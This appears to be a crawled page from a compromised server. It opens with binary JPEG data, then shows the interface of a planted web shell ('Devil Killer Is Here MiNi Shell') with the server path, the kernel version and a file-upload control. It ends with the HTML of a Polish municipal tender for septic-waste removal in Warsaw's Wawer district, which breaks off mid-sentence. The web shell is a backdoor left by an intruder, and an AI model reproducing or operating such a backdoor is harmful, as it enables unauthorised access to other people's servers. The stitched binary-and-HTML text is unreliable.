JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220304/0007534701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> 119/22 Usługi w zakresie wywozu nieczystości ze zbiorników bezodpływowych, WC , znajd. się na poses. adm. przez ZGN w Dzielnicy Wawer oraz ze studzienek chłonnych na terenie Dzielnicy Wawer. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarowania Nieruchomościami w Dzielnicy Wawer m. st. Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010836340</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Trakt Lubelski 353</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-667</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 277 35 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 277 35 67</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wawer.zgn@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zgn-wawer.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administrowanie zasobem nieruchomości stanowiących własność lub współwłasność m.st. Warszawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 119/22 Usługi w zakresie wywozu nieczystości ze zbiorników bezodpływowych, WC , znajd. się na poses. adm. przez ZGN w Dzielnicy Wawer oraz ze studzienek chłonnych na terenie Dzielnicy Wawer. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-263145cc-9b8d-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00075347</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00035071/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Świadczenie usług w zakresie wywozu nieczystości płynnych ze zbiorników bezodpływowych i WC wolnostojących oraz wybieranie wody ze studzienek chłonnych i kratek ściekowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgn-wawer.ezamawiający.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgn-wawer.ezamawiający.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.6.	Zamawiający poniżej wskazuje informacje, o których mowa w § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2020r. poz. 2452), dotyczące systemu dostępnego, pod adresem wskazanym w pkt. 5.2 SWZ. Zamawiający, zgodnie z § 3 ust. 1 ww. Rozporządzenia określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>5 6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>5.6.2.	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>5.6.3.	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>5.6.4.	Włączona obsługa JavaScript;<br/>5.6.5.	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pani danych osobowych, podlegających przetwarzaniu jest: Zakład Gospodarowania Nieruchomościami w Dzielnicy Wawer m.st. Warszawy z siedzibą w Warszawie, adres: ul. Trakt Lubelski 353 04-667 Warszawa, zwany dalej ZGN Wawer lub Administratorem.<br/>2.	Administrator przetwarza Pani dane osobowe: imię, nazwisko, adres zamieszkania, Nr PESEL i Nr NIP, niezbędne do zawarcia i wykonywania umowy, której będzie/jest Pani Stroną. <br/>3.	W związku z przetwarzaniem danych w celach, o których mowa w pkt 3 odbiorcami Pani danych osobowych mogą być: <br/>a) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa; <br/>b) inne podmioty, które na podstawie stosownych umów podpisanych z m.st. Warszawą przetwarzają dane osobowe, dla których Administratorem jest Prezydent m.st. Warszawy.<br/>4.	W związku z przetwarzaniem Pani danych osobowych przysługują Pani następujące uprawnienia: <br/>a)	prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych;<br/>b)	prawo do żądania sprostowania (poprawiania) danych osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne;<br/>c)	prawo do żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku gdy:<br/>	dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane,<br/>	osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych osobowych,<br/>	osoba, której dane dotyczą wycofała zgodę na przetwarzanie danych osobowych, która jest podstawą przetwarzania danych i nie ma innej podstawy prawnej przetwarzania danych,<br/>	dane osobowe przetwarzane są niezgodnie z prawem,<br/>	dane osobowe muszą być usunięte w celu wywiązania się z obowiązku wynikającego z przepisów prawa;<br/>d)	prawo do żądania ograniczenia przetwarzania danych osobowych – w przypadku, gdy:<br/>	osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych,<br/>	przetwarzanie danych jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian ich ograniczenia,<br/>	Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony lub dochodzenia roszczeń,<br/>	osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych, do czasu ustalenia czy prawnie uzasadnione podstawy po stronie administratora są nadrzędne wobec podstawy sprzeciwu;<br/>e)	prawo do przenoszenia danych – w przypadku gdy łącznie spełnione są następujące przesłanki:<br/>	przetwarzanie danych odbywa się na podstawie umowy zawartej z osobą, której dane dotyczą lub na podstawie zgody wyrażonej przez tą osobę,<br/>przetwarzanie odbywa się w sposób zautomatyzowany; <br/>	prawo sprzeciwu wobec przetwarzania danych – w przypadku gdy łącznie spełnione są następujące przesłanki: zaistnieją przyczyny związane z Pani szczególną sytuacją, w przypadku przetwarzania danych na podstawie zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej przez Administratora lub przetwarzanie jest niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratora lub przez stronę trzecią, z wyjątkiem sytuacji, w których nadrzędny charakter wobec tych interesów mają interesy lub podstawowe prawa i wolności osoby, której dane dotyczą, wymagające ochrony danych osobowych, w szczególności gdy osoba, której dane dotyczą jest dzieckiem.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">119/NZ/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku nr 1 do SWZ. Prognozowane ilości nieczystości płynnych:<br/>2679,00 m3 – ilość nieczystości ze zbiorników bezodpływowych i WC<br/>300,00 m 3 – ilość nieczystości płynnych ze studzienek chłonnych.<br/>W przypadku ograniczenia zakresu umowy przez Zamawiającego ustala się minimalną wartość świadczenia stron w wysokości 60% wartości przedmiotu umowy określonej w paragrafie 5 ust. 3 umowy.<br/>3.3. Wykaz posesji i studzienek chłonnych stanowi załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1. Oferty, nie podlegające odrzuceniu, oceniane będą na podstawie następujących kryteriów:<br/><br/>A - Cena za realizację całego zamówienia - waga 60 % - 60 pkt<br/>B – terminu płatnosci - waga 40% - 40 pkt<br/><br/>Punkty przyznane za kryterium A: „cena za realizację całego zamówienia” będą liczone wg następującego wzoru:<br/> <br/> najniższa cena ofertowa<br/> punkty przyznane ........................................................................ x 60%<br/> badanej ofercie cena badanej oferty<br/><br/>Punkty przyznane za kryterium B: „ termin płatnosci” będą liczone w nastepujący sposób:<br/><br/>W załączniku nr 3 do SWZ załączonym do oferty w pkt 4 Wykonawca wpisze jeden z podanych termiów płatnosci (21 dni lub 30 dni)<br/><br/>Termin płatności w badanej ofercie<br/> punkty przyznane ........................................................................ x 40%<br/> badanej ofercie Najdłuższy termin płatności<br/><br/>21.2. Jeżeli w terminie przewidzianym na składanie ofert złożone zostaną co najmniej 2 oferty niepodlegające odrzuceniu Zamawiający po dokonaniu oceny ofert przeprowadzi aukcję elektroniczną w celu wyboru najkorzystniejszej oferty. <br/>23.3. Zgodnie z art. 232 ust. 1 Zamawiający zaprosi drogą elektroniczną (na adres e-mail podany przez Wykonawcę w Formularzu ofertowym) do udziału w aukcji elektronicznej wszystkich wykonawców, którzy złożyli oferty niepodlegające odrzuceniu. <br/>23.4.	W przypadku braku możliwości przeprowadzenia aukcji elektronicznej, Zamawiający wezwie Wykonawców, którzy złożyli oferty o takiej samej cenie, do złożenia w wyznaczonym terminie ofert dodatkowych.<br/><br/>Suma punktów A (po przeprowadzonej aukcji) + B będzie oceną dokonaną przez poszczególnych członków komisji w badanej ofercie.<br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury VAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.1. Spełniają warunki udziału w postępowaniu określone w art. 112 ust. 1 i 2 pkt 1,2,3,4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. Spełnienie ww. warunku ocenione będzie na podstawie oświadczenia wykonawcy, (sporządzonego wg. wzoru, stanowiącego załącznik nr 4 do SWZ), wchodzącego w skład oferty i dokumentów wymienionych w pkt 6.1.2, 6.1.3, 6.1.4, 6.1.5.<br/>6.1.2. Posiadają aktualne, ważne zezwolenie na prowadzenie działalności opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych na terenie m.st. Warszawy zgodnie z art. 7 ust 1 pkt 2 i art. 9 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U z 2021 r., poz. 888 z późn. zm.). Spełnienie tego warunku oceniane będzie na podstawie oświadczenia – załącznik nr 4 do SWZ i kserokopii ww. zezwolenia, poświadczonego „za zgodność z oryginałem”.<br/>6.1.3. Posiadają aktualną umowę na odbiór komunalnych nieczystości płynnych z zakładem prowadzącym działalność w tym zakresie. <br/>Spełnienie tego warunku oceniane będzie na podstawie kserokopii ww. umowy, poświadczonej „za zgodność z oryginałem”.<br/>6.1.4. Posiadają wiedzę i doświadczenie w zakresie realizacji usług, stanowiących przedmiot zamówienia tj. należy wykazać (należy podać pełny wykaz wykonanych usług), że Wykonawca wykonał kompleksowo w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, główne usługi w przedmiocie zamówienia, w tym co najmniej 2 zamówienia obejmujące usługi w zakresie wywozu nieczystości płynnych, każde o wartości co najmniej 80 tys. zł brutto. Spełnienie tego warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 9.1.11. SWZ, sporządzonego wg wzoru, stanowiącego załącznik nr 5 do niniejszej specyfikacji oraz załączonych do oferty referencji lub innych dokumentów, potwierdzających że ww usługi zostały wykonane lub są wykonywane należycie.<br/>6.1.5. Wykonawca musi wykazać, że dysponuje minimum 6 samochodami przystosowanymi do świadczenia usług w zakresie wywozu nieczystości płynnych, w tym: 2 samochodami o pojemności beczki minimum 4,5 m3; 1 samochodem o pojemności beczki minimum 7 m3 ,1 samochodem o pojemności beczki minimum 10 m3 , 1 samochodem o pojemności beczki minimum 14,5 m3, 1 samochodem o pojemności 16 m 3.<br/>Spełnienie tego warunku będzie oceniane na podstawie załączonego do oferty wykazu sprzętu określonego w pkt. 9.1.12. SWZ, sporządzonego wg wzoru stanowiącego załącznik nr 8 do SWZ. <br/>6.1.6. Nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy - załącznik nr 4 do SWZ.<br/>6.2. Ponadto od Wykonawcy wymagane jest:<br/> 6.2.1.	Spełnienie i przyjęcie warunków określonych w niniejszej SWZ oraz załączonym wzorze umowy stanowiącym Załącznik nr 9 do SWZ.<br/>6.2.2. Posiadanie polisy lub innego dokumentu ubezpieczeniowego potwierdzającego, że Wykonawca jest w okresie realizacji Umowy ubezpieczony przez zakład ubezpieczeń działający zgodnie z zasadami określonymi w ustawie z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej lub zawarcie przed rozpoczęciem robót umowy ubezpieczeniowej dotyczącej odpowiedzialności cywilnej za wszelkie wyrządzone przez Wykonawcę szkody osobiste i majątkowe wobec osób trzecich, które mogą powstać w związku z wykonywaniem Umowy. Wymagana suma ubezpieczenia wynikająca z ww. dokumentów winna być nie mniejsza niż 100 000,00 zł <br/>6.2.3.	Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 112 ust 2 pkt 1, 2, 3 i 4, polega na zasobach innych podmiotów na zasadach określonych w art. 118 ust 1 ustawy Pzp, powinien przedłożyć w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia – załącznik nr 6 do SWZ. <br/>Zamawiający wymaga, aby składany dokument:<br/> - wskazywał adres którego dotyczy<br/> - zwierał informację, który zasób jest udostępniany przez dany podmiot,<br/> - w przypadku udostępniania wiedzy i doświadczenia określał konkretną formę udziału ww podmiotu w realizacji zamówienia (np. podwykonawstwo),<br/> - jaki stosunek łączy Wykonawcę z podmiotem udostępniającym zasób (np. umowa zlecenie, umowa o współpracę, kontrakt, inne).<br/>Jeśli Wykonawca nie korzysta z zasobów innych podmiotów dokumentu w postaci załącznika nr 6 nie należy składać wraz z ofertą.<br/> 6.3.	Zamawiający informuje, że w przypadku korzystania z zasobów innych podmiotów spełnienie warunków zapisanych w pkt 6.1.1-6.1.5. w niniejszym postępowaniu przetargowym nastąpi wyłącznie wtedy gdy:<br/>1) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>2) Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności technicznych lub zawodowych lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełnienia warunków udziału w postępowaniu oraz zbada czy nie zachodzą przesłanki wobec tego podmiotu podstawy do wykluczenia, o których mowa w art. 108 ust 1 i art. 109 ust. 1. <br/>3)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">http://aukcje.um.warszawa.pl</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> 11. Aukcja elektroniczna<br/><br/> 11.1Jeżeli w terminie przewidzianym na składanie ofert złożone zostaną co najmniej 2 oferty niepodlegające odrzuceniu Zamawiający po dokonaniu oceny ofert przeprowadzi aukcję elektroniczną w celu wyboru najkorzystniejszej oferty. <br/>11.2.	Zgodnie z art. 232 ust. 2 Zamawiający zaprosi drogą elektroniczną (na adres e-mail podany przez Wykonawcę w Formularzu ofertowym) do udziału w aukcji elektronicznej wszystkich wykonawców, którzy złożyli oferty niepodlegające odrzuceniu. <br/>11.3	W III etapie oceny ofert – aukcji elektronicznej Wykonawcy za pomocą formularza umieszczonego na stronie internetowej http://aukcje.um.warszawa.pl składają kolejne korzystniejsze postąpienia według zasad określonych w art. 232 ust. 2 ustawy Prawo zamówień publicznych.<br/>11.4	Wykonawcy chcący wziąć udział w aukcji elektronicznej muszą się zalogować na platformie aukcyjnej http://aukcje.um.warszawa.pl, wpisując kod dostępu w odpowiednie pole systemu. Kod dostępu zostanie przekazany przez operatora platformy aukcyjnej Wykonawcom, których oferty nie zostaną zakwalifikowane do odrzucenia w I i II etapie oceny ofert. Warunkiem wzięcia udziału w aukcji elektronicznej jest dysponowanie bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. Komputer użytkownika powinien spełniać następujące wymagania:<br/>	być wyposażony w procesor 733 MHz i posiadać co najmniej 512 MB pamięci RAM<br/>	posiadać zainstalowany system operacyjny MS Windows XP lub nowszy<br/>	posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. lub nowszą albo Mozilla Firefox 2.x lub nowszą<br/>	posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s.<br/>11.5 W toku aukcji elektronicznej Wykonawcy za 